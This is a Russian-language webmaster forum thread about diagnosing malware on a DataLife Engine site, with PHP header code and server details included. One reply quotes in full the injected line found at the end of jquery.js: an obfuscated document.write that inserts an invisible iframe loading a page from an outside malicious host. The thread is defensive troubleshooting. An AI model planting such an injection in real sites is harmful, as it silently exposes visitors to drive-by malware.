Перейти к публикации

Вредоносный код


kamwork

Рекомендованные сообщения

Версия DLE стоят 9.3. Из сторонних модулей только sblock. Раньше взламывали сайт, размещали в статьях <script>, в шапке размещали, но все это было легко диагностируемо и как правило помогала свежее обновление программы. Сейчас столкнулся со странной проблемой, при перемещении по сайту или админке, постоянно всплывает что на сайте вирусяка - 20110727-o392-16kb.jpg, просмотрел несколько раз код, уберал все script вообще, не помогало. Убрал тэг - {headers} вирусяка пропадает с клиентской части сайта. В выводимом коде из {headers} нет ни чего криминального, ради эксперимента удалил из engine.php код

/*

=====================================================

 Вывод заголовка страницы 

=====================================================

*/

$titl_e = '';

$nam_e = '';

$rss_url = '';


if ($do == "cat" and $category != '' and $subaction == '') {

...

$metatags = <<<HTML

<meta http-equiv="Content-Type" content="text/html; charset={$config['charset']}" />

<title>{$metatags['title']} </title>

<meta name="description" content="{$metatags['description']}" />

<meta name="keywords" content="{$metatags['keywords']}" />

<meta name="robots" content="all" />

<meta name="revisit-after" content="1 days" />

<link rel="search" type="application/opensearchdescription+xml" href="{$config['http_home_url']}engine/opensearch.php" title="{$config['home_title']}" />

HTML;


if ($config['allow_rss']) $metatags .= <<<HTML


<link rel="alternate" type="application/rss+xml" title="{$rss_title}" href="{$rss_url}" />

HTML;

проблема не исчезла. Подскажите куда и где копать?

Версия DataLife Engine: 9.3

Тип лицензии скрипта: Лицензия активирована

Режим работы сайта: Включен

Операционная система: Linux 2.6.18-194.17.4.el5

Версия PHP: 5.2.14

Версия MySQL: 5.0.77-log MySQLi

Информация о GD: GD Version: bundled (2.0.34 compatible), FreeType Support: Enabled, FreeType Linkage: with freetype, T1Lib Support: Disabled, GIF Read Support: Enabled, GIF Create Support: Enabled, JPG Support: Enabled, PNG Support: Enabled, WBMP Support: Enabled, XPM Support: Disabled, XBM Support: Enabled, JIS-mapped Japanese Font Support: Disabled,

Module mod_rewrite Неопределено

Безопасный режим: Выключен

Выделено оперативной памяти: 256M

Отключенные функции: Неопределено

Максимальный размер загружаемого файла: 1 Gb

Размер свободного места на диске: 629,71 Gb

Ссылка на сообщение
Поделиться на других сайтах

зараза спряталась тут

http://www.pokushay.ru/engine/classes/js/jquery.js

в конце файла ифрейм

document.write('<i'+'frame sr'+'c="http://filtrated.in/wu5y3/07.php" width="0" height="0" frameborder="0">'+'</'+'ifram'+'e>');

Ссылка на сообщение
Поделиться на других сайтах

Благодарю.. Эти файлы я менял 2а дня назад, когда вылезла подобная проблема, просто тогда я в них ни чего не нашел, и списал это на какой то глюк. Через два дня повтор. Сейчас сменил пароли.

Скажите, если на сайт залит шелл, то встроенный антивирус должен показать его ведь? Т.к. это лишний файл?

Ссылка на сообщение
Поделиться на других сайтах

Архивировано

Эта тема находится в архиве и закрыта для публикации сообщений.

×
×
  • Создать...